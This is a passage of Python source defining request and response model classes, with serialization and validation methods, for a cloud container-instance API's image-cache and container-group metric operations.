        self.validate_required(self.image_cache_id, 'image_cache_id')

    def to_map(self):
        """Serialize this model to a wire-format dict."""
        result = {}
        result['RegionId'] = self.region_id
        result['ImageCacheId'] = self.image_cache_id
        result['ClientToken'] = self.client_token
        return result

    def from_map(self, map=None):
        """Populate this model from a wire-format dict and return self.

        Mutable ``{}`` default replaced with ``None`` (shared-default pitfall).
        """
        map = map if map is not None else {}
        self.region_id = map.get('RegionId')
        self.image_cache_id = map.get('ImageCacheId')
        self.client_token = map.get('ClientToken')
        return self
class DeleteImageCacheResponse(TeaModel):
    """Response model for the ECI DeleteImageCache API."""

    def __init__(self, request_id=None):
        self.request_id = request_id

    def validate(self):
        """RequestId is always present on a successful response."""
        self.validate_required(self.request_id, 'request_id')

    def to_map(self):
        """Serialize this model to a wire-format dict."""
        result = {}
        result['RequestId'] = self.request_id
        return result

    def from_map(self, map=None):
        """Populate this model from a wire-format dict and return self.

        Mutable ``{}`` default replaced with ``None`` (shared-default pitfall).
        """
        map = map if map is not None else {}
        self.request_id = map.get('RequestId')
        return self
class CreateImageCacheRequest(TeaModel):
    """Request model for the CreateImageCache API.

    Bug fix over the generated original: the ``image_registry_credential``
    and ``image`` constructor arguments were silently discarded (both were
    always reset to ``[]``); they are now honored, defaulting to empty lists,
    which is backward compatible with the old behavior for callers that
    assigned the attributes after construction.
    """
    def __init__(self, region_id=None, zone_id=None, security_group_id=None,
                 v_switch_id=None, image_cache_name=None,
                 image_registry_credential=None, eip_instance_id=None,
                 resource_group_id=None, client_token=None, image=None,
                 image_cache_size=None, retention_days=None):
        self.region_id = region_id                      # required
        self.zone_id = zone_id
        self.security_group_id = security_group_id      # required
        self.v_switch_id = v_switch_id                  # required
        self.image_cache_name = image_cache_name        # required
        # List of CreateImageCacheRequestImageRegistryCredential models.
        self.image_registry_credential = ([] if image_registry_credential is None
                                          else image_registry_credential)
        self.eip_instance_id = eip_instance_id
        self.resource_group_id = resource_group_id
        self.client_token = client_token
        # List of container image names to cache (required).
        self.image = [] if image is None else image
        self.image_cache_size = image_cache_size
        self.retention_days = retention_days

    def validate(self):
        """Check required fields; cascade into each credential model."""
        self.validate_required(self.region_id, 'region_id')
        self.validate_required(self.security_group_id, 'security_group_id')
        self.validate_required(self.v_switch_id, 'v_switch_id')
        self.validate_required(self.image_cache_name, 'image_cache_name')
        if self.image_registry_credential:
            for k in self.image_registry_credential:
                if k:
                    k.validate()
        self.validate_required(self.image, 'image')

    def to_map(self):
        """Serialize to a dict keyed by wire names; None lists stay None."""
        result = {
            'RegionId': self.region_id,
            'ZoneId': self.zone_id,
            'SecurityGroupId': self.security_group_id,
            'VSwitchId': self.v_switch_id,
            'ImageCacheName': self.image_cache_name,
        }
        if self.image_registry_credential is not None:
            result['ImageRegistryCredential'] = [k.to_map() if k else None
                                                 for k in self.image_registry_credential]
        else:
            result['ImageRegistryCredential'] = None
        result['EipInstanceId'] = self.eip_instance_id
        result['ResourceGroupId'] = self.resource_group_id
        result['ClientToken'] = self.client_token
        result['Image'] = list(self.image) if self.image is not None else None
        result['ImageCacheSize'] = self.image_cache_size
        result['RetentionDays'] = self.retention_days
        return result

    def from_map(self, map=None):
        """Populate from a wire dict, rebuilding credential models; returns self."""
        map = map or {}
        self.region_id = map.get('RegionId')
        self.zone_id = map.get('ZoneId')
        self.security_group_id = map.get('SecurityGroupId')
        self.v_switch_id = map.get('VSwitchId')
        self.image_cache_name = map.get('ImageCacheName')
        if map.get('ImageRegistryCredential') is not None:
            self.image_registry_credential = [
                CreateImageCacheRequestImageRegistryCredential().from_map(k)
                for k in map.get('ImageRegistryCredential')
            ]
        else:
            self.image_registry_credential = None
        self.eip_instance_id = map.get('EipInstanceId')
        self.resource_group_id = map.get('ResourceGroupId')
        self.client_token = map.get('ClientToken')
        if map.get('Image') is not None:
            self.image = list(map.get('Image'))
        else:
            self.image = None
        self.image_cache_size = map.get('ImageCacheSize')
        self.retention_days = map.get('RetentionDays')
        return self
class CreateImageCacheRequestImageRegistryCredential(TeaModel):
    """Private image-registry credential (server, user name, password)."""
    def __init__(self, server=None, user_name=None, password=None):
        self.server = server        # required
        self.user_name = user_name  # required
        self.password = password    # required

    def validate(self):
        """All three credential fields are required."""
        for value, label in ((self.server, 'server'),
                             (self.user_name, 'user_name'),
                             (self.password, 'password')):
            self.validate_required(value, label)

    def to_map(self):
        """Serialize to a dict keyed by wire names."""
        return {
            'Server': self.server,
            'UserName': self.user_name,
            'Password': self.password,
        }

    def from_map(self, map={}):
        """Populate from a wire-format dict and return self."""
        for wire, attr in (('Server', 'server'),
                           ('UserName', 'user_name'),
                           ('Password', 'password')):
            setattr(self, attr, map.get(wire))
        return self
class CreateImageCacheResponse(TeaModel):
    """Response model for the CreateImageCache API."""
    def __init__(self, request_id=None, image_cache_id=None, container_group_id=None):
        self.request_id = request_id                    # required
        self.image_cache_id = image_cache_id            # required
        self.container_group_id = container_group_id    # required

    def validate(self):
        """All response fields are required."""
        for value, label in ((self.request_id, 'request_id'),
                             (self.image_cache_id, 'image_cache_id'),
                             (self.container_group_id, 'container_group_id')):
            self.validate_required(value, label)

    def to_map(self):
        """Serialize to a dict keyed by wire names."""
        return {
            'RequestId': self.request_id,
            'ImageCacheId': self.image_cache_id,
            'ContainerGroupId': self.container_group_id,
        }

    def from_map(self, map={}):
        """Populate from a wire-format dict and return self."""
        for wire, attr in (('RequestId', 'request_id'),
                           ('ImageCacheId', 'image_cache_id'),
                           ('ContainerGroupId', 'container_group_id')):
            setattr(self, attr, map.get(wire))
        return self
class DescribeMultiContainerGroupMetricRequest(TeaModel):
    """Request model for the DescribeMultiContainerGroupMetric API."""
    def __init__(self, region_id=None, container_group_ids=None,
                 resource_group_id=None, metric_type=None):
        self.region_id = region_id                      # required
        self.container_group_ids = container_group_ids  # required
        self.resource_group_id = resource_group_id
        self.metric_type = metric_type

    def validate(self):
        """region_id and container_group_ids are required."""
        for value, label in ((self.region_id, 'region_id'),
                             (self.container_group_ids, 'container_group_ids')):
            self.validate_required(value, label)

    def to_map(self):
        """Serialize to a dict keyed by wire names."""
        return {
            'RegionId': self.region_id,
            'ContainerGroupIds': self.container_group_ids,
            'ResourceGroupId': self.resource_group_id,
            'MetricType': self.metric_type,
        }

    def from_map(self, map={}):
        """Populate from a wire-format dict and return self."""
        for wire, attr in (('RegionId', 'region_id'),
                           ('ContainerGroupIds', 'container_group_ids'),
                           ('ResourceGroupId', 'resource_group_id'),
                           ('MetricType', 'metric_type')):
            setattr(self, attr, map.get(wire))
        return self
class DescribeMultiContainerGroupMetricResponse(TeaModel):
    """Response model for the DescribeMultiContainerGroupMetric API.

    Bug fix over the generated original: the ``monitor_datas`` constructor
    argument was silently discarded (always reset to ``[]``); it is now
    honored, defaulting to an empty list.
    """
    def __init__(self, request_id=None, monitor_datas=None):
        self.request_id = request_id    # required
        # List of DescribeMultiContainerGroupMetricResponseMonitorDatas models.
        self.monitor_datas = [] if monitor_datas is None else monitor_datas

    def validate(self):
        """Both fields are required; cascade into each monitor-data model."""
        self.validate_required(self.request_id, 'request_id')
        self.validate_required(self.monitor_datas, 'monitor_datas')
        if self.monitor_datas:
            for k in self.monitor_datas:
                if k:
                    k.validate()

    def to_map(self):
        """Serialize; a None list serializes as None, else element-wise."""
        result = {'RequestId': self.request_id}
        if self.monitor_datas is not None:
            result['MonitorDatas'] = [k.to_map() if k else None
                                      for k in self.monitor_datas]
        else:
            result['MonitorDatas'] = None
        return result

    def from_map(self, map=None):
        """Populate from a wire dict, rebuilding element models; returns self."""
        map = map or {}
        self.request_id = map.get('RequestId')
        if map.get('MonitorDatas') is not None:
            self.monitor_datas = [
                DescribeMultiContainerGroupMetricResponseMonitorDatas().from_map(k)
                for k in map.get('MonitorDatas')
            ]
        else:
            self.monitor_datas = None
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsContainersCPU(TeaModel):
    """Per-container CPU usage sample within a metric record."""
    def __init__(self, limit=None, load=None, usage_core_nano_seconds=None,
                 usage_nano_cores=None):
        self.limit = limit
        self.load = load
        self.usage_core_nano_seconds = usage_core_nano_seconds
        self.usage_nano_cores = usage_nano_cores

    def validate(self):
        """All four statistics are required."""
        for value, label in ((self.limit, 'limit'), (self.load, 'load'),
                             (self.usage_core_nano_seconds, 'usage_core_nano_seconds'),
                             (self.usage_nano_cores, 'usage_nano_cores')):
            self.validate_required(value, label)

    def to_map(self):
        """Serialize to a dict keyed by wire names."""
        return {
            'Limit': self.limit,
            'Load': self.load,
            'UsageCoreNanoSeconds': self.usage_core_nano_seconds,
            'UsageNanoCores': self.usage_nano_cores,
        }

    def from_map(self, map={}):
        """Populate from a wire-format dict and return self."""
        for wire, attr in (('Limit', 'limit'), ('Load', 'load'),
                           ('UsageCoreNanoSeconds', 'usage_core_nano_seconds'),
                           ('UsageNanoCores', 'usage_nano_cores')):
            setattr(self, attr, map.get(wire))
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsContainersMemory(TeaModel):
    """Per-container memory usage sample within a metric record."""
    def __init__(self, available_bytes=None, usage_bytes=None, cache=None,
                 working_set=None, rss=None):
        self.available_bytes = available_bytes
        self.usage_bytes = usage_bytes
        self.cache = cache
        self.working_set = working_set
        self.rss = rss

    def validate(self):
        """All five statistics are required."""
        for value, label in ((self.available_bytes, 'available_bytes'),
                             (self.usage_bytes, 'usage_bytes'),
                             (self.cache, 'cache'),
                             (self.working_set, 'working_set'),
                             (self.rss, 'rss')):
            self.validate_required(value, label)

    def to_map(self):
        """Serialize to a dict keyed by wire names."""
        return {
            'AvailableBytes': self.available_bytes,
            'UsageBytes': self.usage_bytes,
            'Cache': self.cache,
            'WorkingSet': self.working_set,
            'Rss': self.rss,
        }

    def from_map(self, map={}):
        """Populate from a wire-format dict and return self."""
        for wire, attr in (('AvailableBytes', 'available_bytes'),
                           ('UsageBytes', 'usage_bytes'),
                           ('Cache', 'cache'),
                           ('WorkingSet', 'working_set'),
                           ('Rss', 'rss')):
            setattr(self, attr, map.get(wire))
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsContainers(TeaModel):
    """Per-container metric sample: name plus nested CPU and memory stats."""
    def __init__(self, name=None, _cpu=None, memory=None):
        self.name = name
        # Nested ...RecordsContainersCPU model (required).
        self._cpu = _cpu
        # Nested ...RecordsContainersMemory model (required).
        self.memory = memory

    def validate(self):
        """Check required fields and cascade into the nested models."""
        self.validate_required(self.name, 'name')
        self.validate_required(self._cpu, '_cpu')
        if self._cpu:
            self._cpu.validate()
        self.validate_required(self.memory, 'memory')
        if self.memory:
            self.memory.validate()

    def to_map(self):
        """Serialize; absent nested models serialize as None."""
        return {
            'Name': self.name,
            'CPU': self._cpu.to_map() if self._cpu is not None else None,
            'Memory': self.memory.to_map() if self.memory is not None else None,
        }

    def from_map(self, map={}):
        """Populate from a wire dict, rebuilding nested models; returns self."""
        self.name = map.get('Name')
        cpu_map = map.get('CPU')
        if cpu_map is not None:
            self._cpu = DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsContainersCPU().from_map(cpu_map)
        else:
            self._cpu = None
        mem_map = map.get('Memory')
        if mem_map is not None:
            self.memory = DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsContainersMemory().from_map(mem_map)
        else:
            self.memory = None
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsCPU(TeaModel):
    """Group-level CPU usage sample within a metric record."""
    def __init__(self, limit=None, load=None, usage_core_nano_seconds=None,
                 usage_nano_cores=None):
        self.limit = limit
        self.load = load
        self.usage_core_nano_seconds = usage_core_nano_seconds
        self.usage_nano_cores = usage_nano_cores

    def validate(self):
        """All four statistics are required."""
        for value, label in ((self.limit, 'limit'), (self.load, 'load'),
                             (self.usage_core_nano_seconds, 'usage_core_nano_seconds'),
                             (self.usage_nano_cores, 'usage_nano_cores')):
            self.validate_required(value, label)

    def to_map(self):
        """Serialize to a dict keyed by wire names."""
        return {
            'Limit': self.limit,
            'Load': self.load,
            'UsageCoreNanoSeconds': self.usage_core_nano_seconds,
            'UsageNanoCores': self.usage_nano_cores,
        }

    def from_map(self, map={}):
        """Populate from a wire-format dict and return self."""
        for wire, attr in (('Limit', 'limit'), ('Load', 'load'),
                           ('UsageCoreNanoSeconds', 'usage_core_nano_seconds'),
                           ('UsageNanoCores', 'usage_nano_cores')):
            setattr(self, attr, map.get(wire))
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsMemory(TeaModel):
    """Group-level memory usage sample within a metric record."""
    def __init__(self, available_bytes=None, usage_bytes=None, cache=None,
                 working_set=None, rss=None):
        self.available_bytes = available_bytes
        self.usage_bytes = usage_bytes
        self.cache = cache
        self.working_set = working_set
        self.rss = rss

    def validate(self):
        """All five statistics are required."""
        for value, label in ((self.available_bytes, 'available_bytes'),
                             (self.usage_bytes, 'usage_bytes'),
                             (self.cache, 'cache'),
                             (self.working_set, 'working_set'),
                             (self.rss, 'rss')):
            self.validate_required(value, label)

    def to_map(self):
        """Serialize to a dict keyed by wire names."""
        return {
            'AvailableBytes': self.available_bytes,
            'UsageBytes': self.usage_bytes,
            'Cache': self.cache,
            'WorkingSet': self.working_set,
            'Rss': self.rss,
        }

    def from_map(self, map={}):
        """Populate from a wire-format dict and return self."""
        for wire, attr in (('AvailableBytes', 'available_bytes'),
                           ('UsageBytes', 'usage_bytes'),
                           ('Cache', 'cache'),
                           ('WorkingSet', 'working_set'),
                           ('Rss', 'rss')):
            setattr(self, attr, map.get(wire))
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsNetworkInterfaces(TeaModel):
    """Per-interface network counters within a metric record."""
    def __init__(self, tx_bytes=None, rx_bytes=None, tx_errors=None,
                 rx_errors=None, name=None):
        self.tx_bytes = tx_bytes
        self.rx_bytes = rx_bytes
        self.tx_errors = tx_errors
        self.rx_errors = rx_errors
        self.name = name

    def validate(self):
        """All counters and the interface name are required."""
        for value, label in ((self.tx_bytes, 'tx_bytes'),
                             (self.rx_bytes, 'rx_bytes'),
                             (self.tx_errors, 'tx_errors'),
                             (self.rx_errors, 'rx_errors'),
                             (self.name, 'name')):
            self.validate_required(value, label)

    def to_map(self):
        """Serialize to a dict keyed by wire names."""
        return {
            'TxBytes': self.tx_bytes,
            'RxBytes': self.rx_bytes,
            'TxErrors': self.tx_errors,
            'RxErrors': self.rx_errors,
            'Name': self.name,
        }

    def from_map(self, map={}):
        """Populate from a wire-format dict and return self."""
        for wire, attr in (('TxBytes', 'tx_bytes'), ('RxBytes', 'rx_bytes'),
                           ('TxErrors', 'tx_errors'), ('RxErrors', 'rx_errors'),
                           ('Name', 'name')):
            setattr(self, attr, map.get(wire))
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsNetwork(TeaModel):
    """Network section of a metric record: a list of interface samples.

    Bug fix over the generated original: the ``interfaces`` constructor
    argument was silently discarded (always reset to ``[]``); it is now
    honored, defaulting to an empty list.
    """
    def __init__(self, interfaces=None):
        # List of ...RecordsNetworkInterfaces models (required).
        self.interfaces = [] if interfaces is None else interfaces

    def validate(self):
        """interfaces is required; cascade into each element."""
        self.validate_required(self.interfaces, 'interfaces')
        if self.interfaces:
            for k in self.interfaces:
                if k:
                    k.validate()

    def to_map(self):
        """Serialize; a None list serializes as None, else element-wise."""
        result = {}
        if self.interfaces is not None:
            result['Interfaces'] = [k.to_map() if k else None
                                    for k in self.interfaces]
        else:
            result['Interfaces'] = None
        return result

    def from_map(self, map=None):
        """Populate from a wire dict, rebuilding element models; returns self."""
        map = map or {}
        if map.get('Interfaces') is not None:
            self.interfaces = [
                DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsNetworkInterfaces().from_map(k)
                for k in map.get('Interfaces')
            ]
        else:
            self.interfaces = None
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasRecords(TeaModel):
    """One timestamped metric record: per-container samples plus group-level
    CPU, memory and network aggregates.

    Bug fix over the generated original: the ``containers`` constructor
    argument was silently discarded (always reset to ``[]``); it is now
    honored, defaulting to an empty list.
    """
    def __init__(self, timestamp=None, containers=None, _cpu=None,
                 memory=None, network=None):
        self.timestamp = timestamp
        # List of ...RecordsContainers models (required).
        self.containers = [] if containers is None else containers
        self._cpu = _cpu        # ...RecordsCPU model (required)
        self.memory = memory    # ...RecordsMemory model (required)
        self.network = network  # ...RecordsNetwork model (required)

    def validate(self):
        """All fields are required; cascade into nested models."""
        self.validate_required(self.timestamp, 'timestamp')
        self.validate_required(self.containers, 'containers')
        if self.containers:
            for k in self.containers:
                if k:
                    k.validate()
        self.validate_required(self._cpu, '_cpu')
        if self._cpu:
            self._cpu.validate()
        self.validate_required(self.memory, 'memory')
        if self.memory:
            self.memory.validate()
        self.validate_required(self.network, 'network')
        if self.network:
            self.network.validate()

    def to_map(self):
        """Serialize to a wire-name dict; absent nested models become None."""
        result = {'Timestamp': self.timestamp}
        if self.containers is not None:
            result['Containers'] = [k.to_map() if k else None
                                    for k in self.containers]
        else:
            result['Containers'] = None
        result['CPU'] = self._cpu.to_map() if self._cpu is not None else None
        result['Memory'] = self.memory.to_map() if self.memory is not None else None
        result['Network'] = self.network.to_map() if self.network is not None else None
        return result

    def from_map(self, map=None):
        """Populate from a wire dict, rebuilding nested models; returns self."""
        map = map or {}
        self.timestamp = map.get('Timestamp')
        if map.get('Containers') is not None:
            self.containers = [
                DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsContainers().from_map(k)
                for k in map.get('Containers')
            ]
        else:
            self.containers = None
        cpu = map.get('CPU')
        if cpu is not None:
            self._cpu = DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsCPU().from_map(cpu)
        else:
            self._cpu = None
        mem = map.get('Memory')
        if mem is not None:
            self.memory = DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsMemory().from_map(mem)
        else:
            self.memory = None
        net = map.get('Network')
        if net is not None:
            self.network = DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsNetwork().from_map(net)
        else:
            self.network = None
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsFsStats(TeaModel):
    """Filesystem statistics entry of a container-stats sample.

    All fields are required scalars; the (wire name, attribute) pairs are
    kept in one private table so validation and (de)serialization share it.
    """
    # (wire name, python attribute) pairs, in API order.
    _FIELDS = (
        ('Device', 'device'), ('Type', 'type'), ('Limit', 'limit'),
        ('Usage', 'usage'), ('BaseUsage', 'base_usage'),
        ('Available', 'available'), ('HasInodes', 'has_inodes'),
        ('Inodes', 'inodes'), ('InodesFree', 'inodes_free'),
        ('ReadsCompleted', 'reads_completed'), ('ReadsMerged', 'reads_merged'),
        ('SectorsRead', 'sectors_read'), ('ReadTime', 'read_time'),
        ('WritesCompleted', 'writes_completed'), ('WritesMerged', 'writes_merged'),
        ('SectorsWritten', 'sectors_written'), ('WriteTime', 'write_time'),
        ('IoInProgress', 'io_in_progress'), ('IoTime', 'io_time'),
        ('WeightedIoTime', 'weighted_io_time'),
    )

    def __init__(self, device=None, type=None, limit=None, usage=None,
                 base_usage=None, available=None, has_inodes=None, inodes=None,
                 inodes_free=None, reads_completed=None, reads_merged=None,
                 sectors_read=None, read_time=None, writes_completed=None,
                 writes_merged=None, sectors_written=None, write_time=None,
                 io_in_progress=None, io_time=None, weighted_io_time=None):
        self.device = device
        self.type = type
        self.limit = limit
        self.usage = usage
        self.base_usage = base_usage
        self.available = available
        self.has_inodes = has_inodes
        self.inodes = inodes
        self.inodes_free = inodes_free
        self.reads_completed = reads_completed
        self.reads_merged = reads_merged
        self.sectors_read = sectors_read
        self.read_time = read_time
        self.writes_completed = writes_completed
        self.writes_merged = writes_merged
        self.sectors_written = sectors_written
        self.write_time = write_time
        self.io_in_progress = io_in_progress
        self.io_time = io_time
        self.weighted_io_time = weighted_io_time

    def validate(self):
        """Every statistic is required."""
        for _, attr in self._FIELDS:
            self.validate_required(getattr(self, attr), attr)

    def to_map(self):
        """Serialize to a dict keyed by wire names."""
        return {wire: getattr(self, attr) for wire, attr in self._FIELDS}

    def from_map(self, map={}):
        """Populate every field from a wire-format dict and return self."""
        for wire, attr in self._FIELDS:
            setattr(self, attr, map.get(wire))
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsAcceleratorStats(TeaModel):
    """Accelerator (e.g. GPU) statistics entry of a container-stats sample."""
    def __init__(self, id=None, make=None, model=None, memory_total=None,
                 memory_used=None, duty_cycle=None):
        self.id = id
        self.make = make
        self.model = model
        self.memory_total = memory_total
        self.memory_used = memory_used
        self.duty_cycle = duty_cycle

    def validate(self):
        """All six fields are required."""
        for value, label in ((self.id, 'id'), (self.make, 'make'),
                             (self.model, 'model'),
                             (self.memory_total, 'memory_total'),
                             (self.memory_used, 'memory_used'),
                             (self.duty_cycle, 'duty_cycle')):
            self.validate_required(value, label)

    def to_map(self):
        """Serialize to a dict keyed by wire names."""
        return {
            'Id': self.id,
            'Make': self.make,
            'Model': self.model,
            'MemoryTotal': self.memory_total,
            'MemoryUsed': self.memory_used,
            'DutyCycle': self.duty_cycle,
        }

    def from_map(self, map={}):
        """Populate from a wire-format dict and return self."""
        for wire, attr in (('Id', 'id'), ('Make', 'make'), ('Model', 'model'),
                           ('MemoryTotal', 'memory_total'),
                           ('MemoryUsed', 'memory_used'),
                           ('DutyCycle', 'duty_cycle')):
            setattr(self, attr, map.get(wire))
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsCpuStatsCpuUsage(TeaModel):
    """CPU usage breakdown of a container-stats sample.

    Bug fix over the generated original: the ``per_cpu_usages`` constructor
    argument was silently discarded (always reset to ``[]``); it is now
    honored, defaulting to an empty list.
    """
    def __init__(self, total=None, user=None, system=None, per_cpu_usages=None):
        self.total = total
        self.user = user
        self.system = system
        # List of scalar per-CPU usage values (required).
        self.per_cpu_usages = [] if per_cpu_usages is None else per_cpu_usages

    def validate(self):
        """All four fields are required."""
        self.validate_required(self.total, 'total')
        self.validate_required(self.user, 'user')
        self.validate_required(self.system, 'system')
        self.validate_required(self.per_cpu_usages, 'per_cpu_usages')

    def to_map(self):
        """Serialize; a None list serializes as None, else a shallow copy."""
        result = {
            'Total': self.total,
            'User': self.user,
            'System': self.system,
        }
        if self.per_cpu_usages is not None:
            result['PerCpuUsages'] = list(self.per_cpu_usages)
        else:
            result['PerCpuUsages'] = None
        return result

    def from_map(self, map=None):
        """Populate from a wire-format dict and return self."""
        map = map or {}
        self.total = map.get('Total')
        self.user = map.get('User')
        self.system = map.get('System')
        if map.get('PerCpuUsages') is not None:
            self.per_cpu_usages = list(map.get('PerCpuUsages'))
        else:
            self.per_cpu_usages = None
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsCpuStatsCpuCFS(TeaModel):
    """CFS throttling counters of a container-stats sample."""
    def __init__(self, periods=None, throttled_periods=None, throttled_time=None):
        self.periods = periods
        self.throttled_periods = throttled_periods
        self.throttled_time = throttled_time

    def validate(self):
        """All three counters are required."""
        for value, label in ((self.periods, 'periods'),
                             (self.throttled_periods, 'throttled_periods'),
                             (self.throttled_time, 'throttled_time')):
            self.validate_required(value, label)

    def to_map(self):
        """Serialize to a dict keyed by wire names."""
        return {
            'Periods': self.periods,
            'ThrottledPeriods': self.throttled_periods,
            'ThrottledTime': self.throttled_time,
        }

    def from_map(self, map={}):
        """Populate from a wire-format dict and return self."""
        for wire, attr in (('Periods', 'periods'),
                           ('ThrottledPeriods', 'throttled_periods'),
                           ('ThrottledTime', 'throttled_time')):
            setattr(self, attr, map.get(wire))
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsCpuStats(TeaModel):
    """CPU statistics: load average plus nested usage and CFS throttling."""
    def __init__(self, load_average=None, cpu_usage=None, cpu_cfs=None):
        self.load_average = load_average
        self.cpu_usage = cpu_usage  # nested ...CpuStatsCpuUsage model (required)
        self.cpu_cfs = cpu_cfs      # nested ...CpuStatsCpuCFS model (required)

    def validate(self):
        """All fields are required; cascade into the nested models."""
        self.validate_required(self.load_average, 'load_average')
        self.validate_required(self.cpu_usage, 'cpu_usage')
        if self.cpu_usage:
            self.cpu_usage.validate()
        self.validate_required(self.cpu_cfs, 'cpu_cfs')
        if self.cpu_cfs:
            self.cpu_cfs.validate()

    def to_map(self):
        """Serialize; absent nested models serialize as None."""
        return {
            'LoadAverage': self.load_average,
            'CpuUsage': self.cpu_usage.to_map() if self.cpu_usage is not None else None,
            'CpuCFS': self.cpu_cfs.to_map() if self.cpu_cfs is not None else None,
        }

    def from_map(self, map={}):
        """Populate from a wire dict, rebuilding nested models; returns self."""
        self.load_average = map.get('LoadAverage')
        usage = map.get('CpuUsage')
        if usage is not None:
            self.cpu_usage = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsCpuStatsCpuUsage().from_map(usage)
        else:
            self.cpu_usage = None
        cfs = map.get('CpuCFS')
        if cfs is not None:
            self.cpu_cfs = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsCpuStatsCpuCFS().from_map(cfs)
        else:
            self.cpu_cfs = None
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoServiceBytes(TeaModel):
    """Per-device I/O service-bytes entry of a disk-I/O-stats sample."""
    def __init__(self, device=None, major=None, minor=None, stats=None):
        self.device = device
        self.major = major
        self.minor = minor
        self.stats = stats

    def validate(self):
        """All four fields are required."""
        for value, label in ((self.device, 'device'), (self.major, 'major'),
                             (self.minor, 'minor'), (self.stats, 'stats')):
            self.validate_required(value, label)

    def to_map(self):
        """Serialize to a dict keyed by wire names."""
        return {
            'Device': self.device,
            'Major': self.major,
            'Minor': self.minor,
            'Stats': self.stats,
        }

    def from_map(self, map={}):
        """Populate from a wire-format dict and return self."""
        for wire, attr in (('Device', 'device'), ('Major', 'major'),
                           ('Minor', 'minor'), ('Stats', 'stats')):
            setattr(self, attr, map.get(wire))
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoServiced(TeaModel):
    """Per-device I/O-serviced entry of a disk-I/O-stats sample."""
    def __init__(self, device=None, major=None, minor=None, stats=None):
        self.device = device
        self.major = major
        self.minor = minor
        self.stats = stats

    def validate(self):
        """All four fields are required."""
        for value, label in ((self.device, 'device'), (self.major, 'major'),
                             (self.minor, 'minor'), (self.stats, 'stats')):
            self.validate_required(value, label)

    def to_map(self):
        """Serialize to a dict keyed by wire names."""
        return {
            'Device': self.device,
            'Major': self.major,
            'Minor': self.minor,
            'Stats': self.stats,
        }

    def from_map(self, map={}):
        """Populate from a wire-format dict and return self."""
        for wire, attr in (('Device', 'device'), ('Major', 'major'),
                           ('Minor', 'minor'), ('Stats', 'stats')):
            setattr(self, attr, map.get(wire))
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoQueued(TeaModel):
    """Per-device queued-I/O entry of a disk-I/O-stats sample."""
    def __init__(self, device=None, major=None, minor=None, stats=None):
        self.device = device
        self.major = major
        self.minor = minor
        self.stats = stats

    def validate(self):
        """All four fields are required."""
        for value, label in ((self.device, 'device'), (self.major, 'major'),
                             (self.minor, 'minor'), (self.stats, 'stats')):
            self.validate_required(value, label)

    def to_map(self):
        """Serialize to a dict keyed by wire names."""
        return {
            'Device': self.device,
            'Major': self.major,
            'Minor': self.minor,
            'Stats': self.stats,
        }

    def from_map(self, map={}):
        """Populate from a wire-format dict and return self."""
        for wire, attr in (('Device', 'device'), ('Major', 'major'),
                           ('Minor', 'minor'), ('Stats', 'stats')):
            setattr(self, attr, map.get(wire))
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsSectors(TeaModel):
    """Per-device sector-count entry of a disk-I/O-stats sample."""
    def __init__(self, device=None, major=None, minor=None, stats=None):
        self.device = device
        self.major = major
        self.minor = minor
        self.stats = stats

    def validate(self):
        """All four fields are required."""
        for value, label in ((self.device, 'device'), (self.major, 'major'),
                             (self.minor, 'minor'), (self.stats, 'stats')):
            self.validate_required(value, label)

    def to_map(self):
        """Serialize to a dict keyed by wire names."""
        return {
            'Device': self.device,
            'Major': self.major,
            'Minor': self.minor,
            'Stats': self.stats,
        }

    def from_map(self, map={}):
        """Populate from a wire-format dict and return self."""
        for wire, attr in (('Device', 'device'), ('Major', 'major'),
                           ('Minor', 'minor'), ('Stats', 'stats')):
            setattr(self, attr, map.get(wire))
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoServiceTime(TeaModel):
    """Per-device I/O service-time entry of a disk-I/O-stats sample."""
    def __init__(self, device=None, major=None, minor=None, stats=None):
        self.device = device
        self.major = major
        self.minor = minor
        self.stats = stats

    def validate(self):
        """All four fields are required."""
        for value, label in ((self.device, 'device'), (self.major, 'major'),
                             (self.minor, 'minor'), (self.stats, 'stats')):
            self.validate_required(value, label)

    def to_map(self):
        """Serialize to a dict keyed by wire names."""
        return {
            'Device': self.device,
            'Major': self.major,
            'Minor': self.minor,
            'Stats': self.stats,
        }

    def from_map(self, map={}):
        """Populate from a wire-format dict and return self."""
        for wire, attr in (('Device', 'device'), ('Major', 'major'),
                           ('Minor', 'minor'), ('Stats', 'stats')):
            setattr(self, attr, map.get(wire))
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoWaitTime(TeaModel):
    """Per-device I/O wait-time entry of a disk-I/O-stats sample."""
    def __init__(self, device=None, major=None, minor=None, stats=None):
        self.device = device
        self.major = major
        self.minor = minor
        self.stats = stats

    def validate(self):
        """All four fields are required."""
        for value, label in ((self.device, 'device'), (self.major, 'major'),
